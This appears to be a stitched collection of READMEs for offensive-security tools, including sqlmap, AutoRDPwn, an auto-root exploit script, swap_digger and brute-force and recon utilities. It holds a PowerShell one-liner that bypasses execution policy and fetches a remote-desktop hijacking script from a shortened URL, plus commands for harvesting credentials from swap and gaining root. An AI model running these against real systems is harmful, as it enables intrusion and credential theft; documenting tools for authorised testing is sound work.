SQLMap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester, and a broad range of switches ranging from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

  • Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, HSQLDB and Informix database management systems.
  • Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries and out-of-band.
  • Support to directly connect to the database without passing via a SQL injection, by providing DBMS credentials, IP address, port and database name.
  • Support to enumerate users, password hashes, privileges, roles, databases, tables and columns.
  • Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack.
  • Support to dump database tables entirely, a range of entries or specific columns as per user's choice. The user can also choose to dump only a range of characters from each column's entry.
  • Support to search for specific database names, specific tables across all databases or specific columns across all databases' tables. This is useful, for instance, to identify tables containing custom application credentials where relevant columns' names contain strings like name and pass.
  • Support to download and upload any file from the file system underlying the database server when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
  • Support to execute arbitrary commands and retrieve their standard output on the operating system underlying the database server when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
  • Support to establish an out-of-band stateful TCP connection between the attacker machine and the operating system underlying the database server. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session, as per user's choice.
  • Support for database process' user privilege escalation via Metasploit's Meterpreter getsystem command.
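The dictionary-based hash cracking mentioned above boils down to hashing each candidate word and comparing it against the recovered hash. A minimal illustrative sketch (not sqlmap's actual implementation):

```python
import hashlib

def dictionary_attack(target_hash, wordlist, algo="md5"):
    """Hash each candidate word and compare against the target hash."""
    for word in wordlist:
        if hashlib.new(algo, word.encode()).hexdigest() == target_hash:
            return word
    return None

# Example: a recovered MD5 hash cracked against a tiny wordlist.
target = hashlib.md5(b"secret").hexdigest()
print(dictionary_attack(target, ["admin", "letmein", "secret"]))  # secret
```

sqlmap additionally recognizes the hash format automatically; here the algorithm is passed in explicitly.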

You can download the latest tarball by clicking here or latest zipball by clicking here.
Preferably, you can download sqlmap by cloning the Git repository:

git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev

sqlmap works out of the box with Python version 2.6.x and 2.7.x on any platform.

To get a list of basic options and switches use:

python sqlmap.py -h

To get a list of all options and switches use:

python sqlmap.py -hh

You can find a sample run here. To get an overview of sqlmap capabilities, list of supported features and description of all options and switches, along with examples, you are advised to consult the user's manual.




Nameles provides an easy-to-deploy, scalable IVT (invalid traffic) detection and filtering solution, proven to detect ad fraud and other types of invalid traffic, such as web scraping, with a high level of accuracy.
For a high-level overview you might want to check out the website.
If you have any questions or need support, try the gitter channel.

Getting Started

wget https://raw.githubusercontent.com/Nameles-Org/Nameles/master/setup
chmod +x setup && ./setup

More detailed information related with setup options is provided below.

Detection Capability
While absolute measurement of detection capability is impossible, Nameles is the only detection solution that can be audited by independent parties and that is backed by several scientific papers.
Nameles can detect invalid traffic on:

  • mobile and desktop
  • display, video, and in-app

Detection Method
Nameles implements a highly scalable detection method: it computes the Shannon entropy of the IP addresses from which a given site receives traffic, and then assigns the site a normalized score based on its traffic pattern.
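The scoring idea can be illustrated with a toy computation (illustrative only; Nameles' actual implementation lives in its sources):

```python
from collections import Counter
from math import log2

def shannon_entropy(ips):
    """Shannon entropy (in bits) of the empirical IP distribution."""
    counts = Counter(ips)
    total = len(ips)
    return sum((c / total) * log2(total / c) for c in counts.values())

# Organic traffic tends to come from many distinct IPs (high entropy);
# invalid traffic often hammers from a few IPs (low entropy).
organic = ["1.1.1.1", "2.2.2.2", "3.3.3.3", "4.4.4.4"]
bot = ["5.5.5.5", "5.5.5.5", "5.5.5.5", "5.5.5.5"]
print(shannon_entropy(organic))  # 2.0
print(shannon_entropy(bot))      # 0.0
```

Nameles then normalizes such per-site measurements into the confidence score described below.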

Entropy has been used widely in finance, intelligence, and other fields where vast amounts of data and many unknowns characterize the problem. The use of Shannon entropy has been covered in hundreds of scientific papers. Some argue that Shannon received it from Alan Turing himself, and that it was the method Turing used to crack Nazi codes.

System Overview
Nameles consists of two separate modules: the scoring module and the data processing module.

The scoring-module replies to the query messages sent by the DSP with the confidence score of the domain and the category in which the domain falls, based on statistical thresholds of outlierness. In addition, the scoring-module forwards the messages to the data-processing-module, which updates the scores at the end of the day. The modules communicate using zeromq.
Figure 1: An example deployment with a DSP

Figure 1 presents a high-level representation of Nameles' functional blocks. Moreover, the figure shows how Nameles could be integrated into the programmatic ad delivery chain as an auxiliary service for DSPs. The only difference with respect to the current operation of a DSP is that, as part of the pre-bid phase, the DSP asks Nameles for a confidence score per bid request. To this end, the DSP sends a scoring request to Nameles (step 2 in Figure 1). The scoring request includes the following fields: the bid request id (mapping the Nameles result to the corresponding bid request), the IP address of the device associated with the bid event, and the domain offering the ad space. This information is included in bid requests as defined by the OpenRTB protocol standard. The scoring request is delivered to two independent modules of Nameles: the scoring module and the data processing module.
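The exact wire format is defined by the Nameles sources; a hypothetical sketch of packing the three scoring-request fields named above into a single message (JSON chosen here only for illustration) might look like:

```python
import json

def make_scoring_request(bid_request_id, device_ip, domain):
    """Pack the three fields taken from the OpenRTB bid request."""
    return json.dumps({
        "id": bid_request_id,   # maps the score back to the bid request
        "ip": device_ip,        # device associated with the bid event
        "domain": domain,       # site offering the ad space
    })

print(make_scoring_request("b-1234", "203.0.113.7", "example.com"))
```

In a real deployment this message would be pushed over the zeromq socket that the scoring module listens on.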

Scoring Module
The scoring-module runs several worker threads that pull the queries from the DSP end and push back the reply messages. The workers perform a single lookup in a shared hash table for each message, so the host running the scoring-module requires minimal memory and disk. We recommend running one worker per CPU core and running latency tests with your expected throughput load in order to determine an appropriate number of processors for the host. Note that you can run several scoring modules in your system communicating with the same data processing module.

Data Processing Module
The data-processing-module performs precomputations on the stream of data received from the scoring module. The data is periodically serialized to a PostgreSQL database, and the scores are computed at the end of each day. The host of this module benefits from a large amount of RAM and several processors in order to reduce the score computation times. We recommend at least 64GB of RAM and 4 cores.

In the case of a DSP, a response to a given bid request has to be received by the Ad Exchange within 100 ms. Hence, the delay introduced by Nameles is limited to a few ms in order to minimize the impact on the overall bidding process delay. This ensures that, also when used by an Ad Exchange, the strict requirements for avoiding delays on publisher websites are met.
Figure 2: Stress-testing results with Nameles using real data

Figure 2 shows the performance of Nameles once deployed. The x-axis shows the different tested scoring request rates (QPS). The left and right y-axes show the 95th-percentile filtering delay and 95th-percentile memory consumption for the different scoring request rates. The line in the figure represents the average of the 95th-percentile values across the 5 experiments, whereas the lighter colored area shows the max and min 95th-percentile values.

1. Before Deployment

1.1. System Requirements
You have the option of setting up Nameles on a single machine, or 3 separate machines. For a production system, we recommend:

1.1.1. Operating System
Nameles has been built and tested on Ubuntu / Debian systems.

1.1.2. Single Machine

  • 4 cpu cores
  • 64GB of RAM

1.1.3. Multi Machine
scoring module

  • 2 cpu cores
  • 4GB of RAM

data processing module

  • 4 cpu cores
  • 64GB of RAM

dsp emulator module

  • 4 cpu cores
  • 8GB of RAM

1.2. Dependencies
Dependencies will be taken care of by the setup script, so you should not have to worry about anything more than running ./setup as shown in sections 2.1 and 2.2, depending on your system configuration. The main dependencies are:

  • docker-ce
  • psql

2. Install Nameles
You can install Nameles on a single machine or on a cluster of multiple machines by following the instructions in section 2.1 below. There are two options:

  • single configuration deployment
  • multiple configuration deployment

If you install Nameles on a multi-machine docker cluster/swarm, you have two options: a) let docker allocate resources per service, or b) allocate the resources yourself.

2.1 Installation with Setup Script
For running Nameles on a single server on an Ubuntu or Debian system:

# download the setup script
wget https://raw.githubusercontent.com/Nameles-Org/Nameles/master/setup

# change the permissions
chmod +x setup

# run the setup script
./setup

2.3. Test Installation
You will have to open another shell, since the shell where you ran the setup now has a docker instance running in it.

psql -h <host> -p 5430 -U nameles

NOTE: you need to have installed the PostgreSQL client as detailed in section 1.2

3. Using Nameles
The dsp-emulator module can be used as an example for interfacing with Nameles from your own infrastructure, i.e. message formatting and zeromq port bindings. The latency test source code is implemented in C++, but any other language with zeromq bindings could be used.

3.1. Restarting

3.1.1. Single Configuration Install
If the machine where Nameles is running reboots or is interrupted for another reason, you can restart with:

sudo docker-compose -f ~/Nameles/nameles-docker-compose.yml up

3.1.2. Multiple Configuration Install
Note that after each command you have to start a new shell, as the current shell has a container running in it.

sudo docker-compose -f ~/Nameles/data-docker-compose.yml up
sudo docker-compose -f ~/Nameles/scoring-docker-compose.yml up
sudo docker-compose -f ~/Nameles/emulator-docker-compose.yml up

Reconnaissance Swiss Army Knife

Main Features

  • Wizard + CLA interface
  • Can extract targets from STDIN (piped input) and act upon them
  • All the information is extracted via APIs; no direct contact is made with the target



Video demo: https://www.youtube.com/watch?v=CHkIMcSzzCY

Recon Dog will run on anything that has a Python interpreter installed. However, it has been tested on the following configurations:
Operating Systems: Windows, Linux, Mac
Python Versions: Python 2.7, Python 3.6

Recon Dog requires no manual configuration and can simply be run as a normal Python script.
However, a Debian package can be downloaded from here if you want to install it.


Wizard Interface
The wizard interface is the most straightforward way to use Recon Dog. Just run the program, select what you want to do, and enter the target; it's that simple.

CLA Interface
Recon Dog also has a Command Line Argument (CLA) interface. Here's how you can find subdomains:

python dog -t marvel.com -c 7

There's more to it! Do you have a program that can enumerate subdomains, and you want to scan the ports of all the subdomains it finds? Don't worry, Recon Dog is designed to handle such cases. You can simply do this:

subdomainfinder -t example.com | python dog --domains -c 3

Also, it doesn't matter what kind of output the other program generates: Recon Dog uses regular expressions to find targets, which makes it easy to integrate with literally any tool. There are two switches available:

--domains    extract domains from STDIN
--ips        extract IP addresses from STDIN
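The regex-based extraction described above can be sketched as follows (illustrative patterns, not necessarily the ones Recon Dog actually ships):

```python
import re

# Illustrative patterns; Recon Dog's actual regexes may differ.
DOMAIN_RE = re.compile(r"\b(?:[a-z0-9-]+\.)+[a-z]{2,}\b", re.I)
IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")

def extract_targets(text, want="domains"):
    """Pull domains or IPv4 addresses out of arbitrary tool output."""
    pattern = DOMAIN_RE if want == "domains" else IP_RE
    return sorted(set(pattern.findall(text)))

# Works on messy output from any other tool:
noisy = "Found: sub.example.com (10.0.0.1) -- see www.example.com"
print(extract_targets(noisy))          # ['sub.example.com', 'www.example.com']
print(extract_targets(noisy, "ips"))   # ['10.0.0.1']
```

Because only pattern matches are kept, banners, colors, and other tool chatter on STDIN are simply ignored.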

Auto Root Exploit Tool
Author : Nilotpal Biswas
Facebook : https://www.facebook.com/nilotpal.biswas.73
Twitter : https://twitter.com/nilotpalhacker


for kernel version 2.6 all
bash autoroot.sh 2

for kernel version 3 all
bash autoroot.sh 3

for kernel version 4 all
bash autoroot.sh 4

for freebsd & openbsd all
bash autoroot.sh bsd

for apple macos all
bash autoroot.sh app

for kernel 2.6,3,4 bsd & app all
bash autoroot.sh all

Screenshot 1

Screenshot 2

All exploits are suggested by exploit-db.com and will be updated according to it.

Quasar is an information gathering framework for penetration testers, coded by Belahsan Ouerghi:
  • Website Information
  • E-mail Address Checker
  • Phone Number Information
  • Credit Card BIN Checker
  • IP Locator
  • Port Scanner


sudo apt-get install git
git clone https://github.com/TunisianEagles/quasar.git
cd quasar
chmod +x install.sh
chmod +x quasar.sh
sudo ./install.sh
sudo ./quasar.sh


Tested On :

  • Backbox linux
  • Ubuntu


Video demo: https://www.youtube.com/watch?v=VuQ6rH6yJtQ


  • Contact – Belahsan Ouerghi
  • Youtube – Tunisian Eagles Youtube Channel

This is a tool to enumerate subdomains using the Certificate Transparency logs stored by Censys. It should return any subdomain that has ever been issued an SSL certificate by a public CA.
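Conceptually, the core filtering step — keep only certificate names that fall under the queried domain, strip wildcard labels, and deduplicate — can be sketched as follows (illustrative, not the tool's actual code):

```python
def filter_subdomains(names, domain):
    """Keep unique certificate names that fall under `domain`."""
    found = set()
    for name in names:
        name = name.lower().lstrip("*.")  # drop wildcard labels like *.
        if name == domain or name.endswith("." + domain):
            found.add(name)
    return sorted(found)

# Names as they might appear on issued certificates:
certs = ["www.github.com", "*.github.com", "GitHub.com", "evil-github.com"]
print(filter_subdomains(certs, "github.com"))  # ['github.com', 'www.github.com']
```

Note the `endswith("." + domain)` check: it rejects lookalike registrations such as evil-github.com that merely contain the domain as a suffix.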

See it in action:
$ python censys_subdomain_finder.py github.com

[*] Searching Censys for subdomains of github.com
[*] Found 42 unique subdomains of github.com in ~1.7 seconds

- hq.github.com
- talks.github.com
- cla.github.com
- github.com
- cloud.github.com
- enterprise.github.com
- help.github.com
- collector-cdn.github.com
- central.github.com
- smtp.github.com
- cas.octodemo.github.com
- schrauger.github.com
- jobs.github.com
- classroom.github.com
- dodgeball.github.com
- visualstudio.github.com
- branch.github.com
- www.github.com
- edu.github.com
- education.github.com
- import.github.com
- styleguide.github.com
- community.github.com
- server.github.com
- mac-installer.github.com
- registry.github.com
- f.cloud.github.com
- offer.github.com
- helpnext.github.com
- foo.github.com
- porter.github.com
- id.github.com
- atom-installer.github.com
- review-lab.github.com
- vpn-ca.iad.github.com
- maintainers.github.com
- raw.github.com
- status.github.com
- camo.github.com
- support.enterprise.github.com
- stg.github.com
- rs.github.com


  1. Register an account (free) on https://censys.io/register
  2. Browse to https://censys.io/account, and set two environment variables with your API ID and API secret
$ export CENSYS_API_ID=...
$ export CENSYS_API_SECRET=...
  3. Clone the repository
$ git clone https://github.com/christophetd/censys-subdomain-finder.git
  4. Install the dependencies
$ cd censys-subdomain-finder
$ pip install -r requirements.txt
  5. Run the script on example.com to make sure everything works as expected.
$ python censys_subdomain_finder.py example.com

[*] Searching Censys for subdomains of example.com
[*] Found 5 unique subdomains of example.com

- products.example.com
- www.example.com
- dev.example.com
- example.com
- support.example.com


usage: censys_subdomain_finder.py [-h] [-o OUTPUT_FILE]
                                  [--censys-api-id CENSYS_API_ID]
                                  [--censys-api-secret CENSYS_API_SECRET]
                                  domain

positional arguments:
  domain                The domain to scan

optional arguments:
  -h, --help            show this help message and exit
  -o OUTPUT_FILE        A file to output the list of subdomains to (default:
                        None)
  --censys-api-id CENSYS_API_ID
                        Censys API ID. Can also be defined using the
                        CENSYS_API_ID environment variable (default: None)
  --censys-api-secret CENSYS_API_SECRET
                        Censys API secret. Can also be defined using the
                        CENSYS_API_SECRET environment variable (default: None)

Should run on Python 2.7 and 3.5.

The Censys API has a rate limit of 120 queries per 5-minute window. Each invocation of this tool makes exactly one API call to Censys.
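If you wrap the tool in a loop over many domains, you need to stay under that limit yourself. A minimal sliding-window limiter (illustrative sketch, with an injectable clock so the logic is testable) could look like:

```python
import time
from collections import deque

class RateLimiter:
    """Allow at most `limit` calls per `window` seconds (sliding window)."""
    def __init__(self, limit=120, window=300, clock=time.monotonic):
        self.limit, self.window, self.clock = limit, window, clock
        self.calls = deque()  # timestamps of recent allowed calls

    def allow(self):
        now = self.clock()
        # Drop timestamps that have slid out of the window.
        while self.calls and now - self.calls[0] >= self.window:
            self.calls.popleft()
        if len(self.calls) < self.limit:
            self.calls.append(now)
            return True
        return False

# With a fake clock: 120 calls pass, the 121st is rejected.
t = [0.0]
rl = RateLimiter(clock=lambda: t[0])
assert all(rl.allow() for _ in range(120))
assert not rl.allow()
t[0] = 300.0  # the window slides past the earliest calls
assert rl.allow()
```

Calling `allow()` before each invocation (and sleeping when it returns False) keeps a batch run within the Censys quota.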
Feel free to open an issue or to tweet @christophetd for suggestions or remarks.

With this small suite of open source pentesting tools you're able to create an image (.jpg), audio (.mp3) or video (.mp4) file containing your custom metadata or a set of cross-site scripting vectors, to test any web service against possible XSS vulnerabilities when displaying unfiltered metadata.

Installation / Usage
First install docker on your host system.
Now you can simply run the following command:
sudo docker run -p 80:80 --rm lednerb/metadata-attacker
When finished, open your favorite browser and browse to the Docker IP or http://localhost

AutoRDPwn is a script created in PowerShell and designed to automate the Shadow attack on Microsoft Windows computers. This vulnerability allows a remote attacker to view the victim's desktop without their consent, and even control it on demand. For its correct operation, it is necessary to comply with the requirements described in the user guide.

PowerShell 5.0 or higher


Version 4.0
• Fixed a bug in the scheduled task to remove the user AutoRDPwn
• The Scheduled Task attack has been replaced by Invoke-Command
• It is now possible to choose the language of the application and launch the attack on English versions of Windows
The rest of the changes can be consulted in the CHANGELOG file.

Execution in a line:
powershell -ExecutionPolicy Bypass "cd $env:TEMP; iwr https://goo.gl/HSkAXP -OutFile AutoRDPwn.ps1; .\AutoRDPwn.ps1"
The detailed guide of use can be found at the following link:

Credits and Acknowledgments
Mark Russinovich for his tool PsExec -> https://docs.microsoft.com/en-us/sysinternals/downloads/psexec
Stas'M Corp. for their tool RDP Wrapper -> https://github.com/stascorp/rdpwrap
Kevin Robertson for his tool Invoke-TheHash -> https://github.com/Kevin-Robertson/Invoke-TheHash
Benjamin Delpy for his tool Mimikatz -> https://github.com/gentilkiwi/mimikatz

This software does not offer any kind of guarantee. Its use is exclusively for educational environments and/or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.
For more information, you can contact through info@darkbyte.net

swap_digger is a bash script used to automate Linux swap analysis for post-exploitation or forensics purposes. It automates swap extraction and searches for Linux user credentials, web form credentials, web form emails, HTTP basic authentication, WiFi SSIDs and keys, etc.
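swap_digger itself does this with shell tooling, but the basic idea — extract printable strings from a raw swap dump, then match credential-looking patterns — can be sketched in a few lines (illustrative only; the pattern below is a hypothetical example, not the script's actual rules):

```python
import re

# Printable ASCII runs of 6+ chars, like the `strings` utility extracts.
STRINGS_RE = re.compile(rb"[ -~]{6,}")
# Credential-looking key=value pairs (hypothetical, illustrative pattern).
CRED_RE = re.compile(r"(?:password|passwd|pwd)=\S+", re.I)

def dig(raw: bytes):
    """Return credential-looking strings found in a raw swap dump."""
    hits = []
    for m in STRINGS_RE.finditer(raw):
        hits.extend(CRED_RE.findall(m.group().decode("ascii")))
    return hits

dump = b"\x00\x01garbage\x00login=alice&password=hunter2\x00\xffmore"
print(dig(dump))  # ['password=hunter2']
```

Swap pages preserve memory from terminated processes, which is why such plain-text fragments survive there at all.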

Download and run the tool

On your machine
Use the following commands to download and run the script on your machine:

alice@1nvuln3r4bl3:~$ git clone https://github.com/sevagas/swap_digger.git
alice@1nvuln3r4bl3:~$ cd swap_digger
alice@1nvuln3r4bl3:~$ chmod +x swap_digger.sh
alice@1nvuln3r4bl3:~$ sudo ./swap_digger.sh -vx

On a mounted hard drive
To use swap_digger on a mounted hard drive, do the following:
First, download the script using the following commands:

alice@1nvuln3r4bl3:~$ git clone https://github.com/sevagas/swap_digger.git
alice@1nvuln3r4bl3:~$ cd swap_digger
alice@1nvuln3r4bl3:~$ chmod +x swap_digger.sh

Then, find the target swap file/partition with:

alice@1nvuln3r4bl3:~$ sudo ./swap_digger.sh -S

Finally, analyze the target by running:

alice@1nvuln3r4bl3:~$ sudo ./swap_digger.sh -vx -r path/to/mounted/target/root/fs -s path/to/target/swap/device

On a third party machine
Use the following commands to download and run the script on a third party machine (useful for pentests and CTFs):

alice@1nvuln3r4bl3:~$ wget https://raw.githubusercontent.com/sevagas/swap_digger/master/swap_digger.sh
alice@1nvuln3r4bl3:~$ chmod +x swap_digger.sh
alice@1nvuln3r4bl3:~$ sudo ./swap_digger.sh -vx

Note: Use the -c option to automatically remove the directory created by swap_digger (/tmp/swap_dig).

Simple run
If you only need to recover clear text Linux user passwords, simply run:

alice@1nvuln3r4bl3:~$ sudo ./swap_digger.sh

Available options
All options:

 ./swap_digger.sh [ OPTIONS ]
Options :
  -x, --extended             Run extended tests on the target swap to retrieve other
                             interesting data (web passwords, emails, wifi creds,
                             most accessed urls, etc.)
  -g, --guessing             Try to guess potential passwords based on observations
                             and stats. Warning: this option is not reliable; it may
                             dig up more passwords as well as hundreds of false positives.
  -h, --help                 Display this help.
  -v, --verbose              Verbose mode.
  -l, --log                  Log all output to a log file (protected inside the
                             generated working directory).
  -c, --clean                Automatically erase the generated working directory at
                             the end of the script (also removes the log file).
  -r PATH, --root-path=PATH  Location of the target file system root (default value is /).
                             Change this value for forensic analysis when the target
                             is a mounted file system. This option has to be used along
                             with the -s option to indicate the path to the swap device.
  -s PATH, --swap-path=PATH  Location of the swap device or swap dump to analyse.
                             Use this option for forensic/remote analysis of a swap
                             dump or a mounted external swap partition. This option
                             should be used with the -r option pointing to a root
                             where at least /etc/shadow exists.
  -S, --swap-search          Search for all available swap devices (use for forensics).

Relevant resources
Blog posts about swap digging:

Feel free to message me on my Twitter account @EmericNasi

Automates some pentesting work via an nmap XML file. As soon as each command finishes it writes its output to the terminal and the files in output-by-service/ and output-by-host/. Runs fast-returning commands first. Please send me protocols/commands/options that you would like to see included.
  • HTTP
    • whatweb
    • EyeWitness with active login attempts
    • light dirb directory bruteforce
  • DNS
    • nmap NSE dns-zone-transfer and dns-recursion
  • MySQL
    • light patator bruteforce
  • PostgreSQL
    • light patator bruteforce
  • SMTP
    • nmap NSE smtp-enum-users and smtp-open-relay
  • SNMP
    • light patator bruteforce
      • snmpcheck (if patator successfully finds a string)
  • SMB
    • enum4linux -a
    • nmap NSE smb-enum-shares, smb-vuln-ms08-067, smb-vuln-ms17-010
  • SIP
    • nmap NSE sip-enum-users and sip-methods
    • svmap
  • RPC
    • showmount -e
  • NTP
    • nmap NSE ntp-monlist
  • FTP
    • light patator bruteforce
  • Telnet
    • light patator bruteforce
  • SSH
    • light patator bruteforce
  • WordPress 4.7
    • XSS content uploading
  • To add:
    • IPMI hash disclosure
    • ike-scan (can't run ike-scans in parallel)


source pm/bin/activate

Read from an Nmap XML file:
sudo ./pentest-machine -x nmapfile.xml
Perform an Nmap scan with a hostlist, then use those results. The Nmap scan will do the top 1000 TCP ports and the top 100 UDP ports along with service enumeration, and will save the results as pm-nmap.[xml/nmap/gnmap] in the current working directory:
sudo ./pentest-machine -l hostlist.txt
Skip the patator bruteforcing and all SIP and HTTP commands. The -s parameter can skip both command names as well as protocol names:
sudo ./pentest-machine -s patator,sip,http -x nmapfile.xml
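pentest-machine drives everything from the nmap XML file; pulling (host, port, service) tuples out of such a file can be sketched with the standard library (illustrative, not the tool's actual parser):

```python
import xml.etree.ElementTree as ET

def open_services(xml_text):
    """Yield (address, port, service) for every open port in nmap XML."""
    root = ET.fromstring(xml_text)
    for host in root.iter("host"):
        addr = host.find("address").get("addr")
        for port in host.iter("port"):
            if port.find("state").get("state") == "open":
                svc = port.find("service")
                name = svc.get("name") if svc is not None else "unknown"
                yield addr, int(port.get("portid")), name

# Trimmed-down sample of nmap -oX output:
SAMPLE = """<nmaprun><host><address addr="10.0.0.5"/>
<ports><port protocol="tcp" portid="22"><state state="open"/>
<service name="ssh"/></port></ports></host></nmaprun>"""
print(list(open_services(SAMPLE)))  # [('10.0.0.5', 22, 'ssh')]
```

Mapping the service names onto per-protocol command lists is then what produces the output-by-service/ and output-by-host/ files described above.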